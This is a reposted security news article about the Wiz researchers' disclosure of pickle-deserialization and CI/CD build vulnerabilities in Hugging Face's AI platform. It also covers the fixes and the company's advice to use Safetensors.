Source: www.databreachtoday.com – Author: 1
Artificial Intelligence & Machine Learning
,
Next-Generation Technologies & Secure Development
Researchers Say Illegal Access to Private AI models Can Enable Cross-Tenant Attacks
Mihir Bagwe (MihirBagwe) •
April 8, 2024
Security researchers have discovered two critical vulnerabilities in the Hugging Face AI platform that exposed potential gaps for attackers seeking unauthorized access and manipulation of customer data and models.
See Also: Generative AI Survey Result Analysis: Google Cloud
The Google and Amazon-funded Hugging Face platform is designed to help developers seamlessly access and deploy AI models. Researchers at Wiz teamed with Hugging Face to find and fix two significant risks within the AIaaS platform’s infrastructure.
“If a malicious actor were to compromise Hugging Face’s platform, they could potentially gain access to private AI models, datasets and critical applications, leading to widespread damage and potential supply chain risk,” Wiz said in a report released last week.
The two distinct risks originate from the compromise of shared inference infrastructure and shared CI/CD systems. Such a breach could facilitate the execution of untrusted models uploaded in ‘pickle’ format on the service and enable the manipulation of the CI/CD pipeline to orchestrate a supply chain attack.
Pickle is a Python module that allows serialization and deserialization of Python objects. It helps in convert a Python object into a byte stream and store it on a disk, send it over a network, or store in a database. When the object is required again, the byte stream is deserialized back into a Python object. Despite the Python software foundation’s acknowledgment of Pickle’s insecurity, it remains popular due to its simplicity and widespread use.
Malicious actors could craft pickle-serialized models containing remote code execution payloads, potentially granting them escalated privileges and cross-tenant access to other customers’ models, explained Wiz researchers.
Attackers exploiting vulnerabilities in the CI/CD pipeline could inject malicious code into the build process. By compromising the CI/CD cluster, attackers could orchestrate supply chain attacks, potentially compromising the integrity of AI applications deployed on the platform.
Wiz researchers demonstrated the exploitation of these vulnerabilities in a YouTube video in which they are seen uploading a specially crafted pickle-based model to Hugging Face’s platform. Using the insecure deserialization behavior of Pickle, they executed remote code, gaining access to the inference environment within Hugging Face’s infrastructure. “It is relatively straightforward to craft a PyTorch (Pickle) model that will execute arbitrary code upon loading,” Wiz said. Even Hugging Face is aware of this but “because the community still uses PyTorch pickle, Hugging Face needs to support it,” Wiz added.
Wiz’s investigation observed that their model operated within a pod in a cluster on Amazon Elastic Kubernetes Service – also known as EKS. The researchers used common misconfigurations and extracted information that gave them privileges necessary to access secrets required to breach other tenants on the shared infrastructure for lateral movement.
Wiz researchers also identified weakness in Hugging Face Spaces, a hosting service for showcasing AI/ML applications or collaborative model development. Wiz found that an attacker could execute arbitrary code during application build time, enabling them to scrutinize network connections from their machine. Their examination revealed a connection to a shared container registry housing images belonging to other customers, which they could manipulate.
Hugging Face said it has effectively mitigated the risks found by Wiz and implemented a cloud security posture management offering, vulnerability scanning and annual penetration testing activity to identify and mitigate future risks to the platform.
Hugging Face also advised users to replace pickle files that inherently contain security issues with Safetensors, a format devised by the company to store tensors.
Vulnerabilities disclosed at Hugging Face marked the second set up flaws found in the AIaaS platform in the past four months. The company confirmed in December that it fixed critical API flaws that were reported by another cybersecurity company, Lasso Security (see: API Flaws Put AI Models at Risk of Data Poisoning).
Original Post url: https://www.databreachtoday.com/hugging-face-vulnerabilities-highlight-ai-as-a-service-risks-a-24807
Category & Tags: –
Views: 0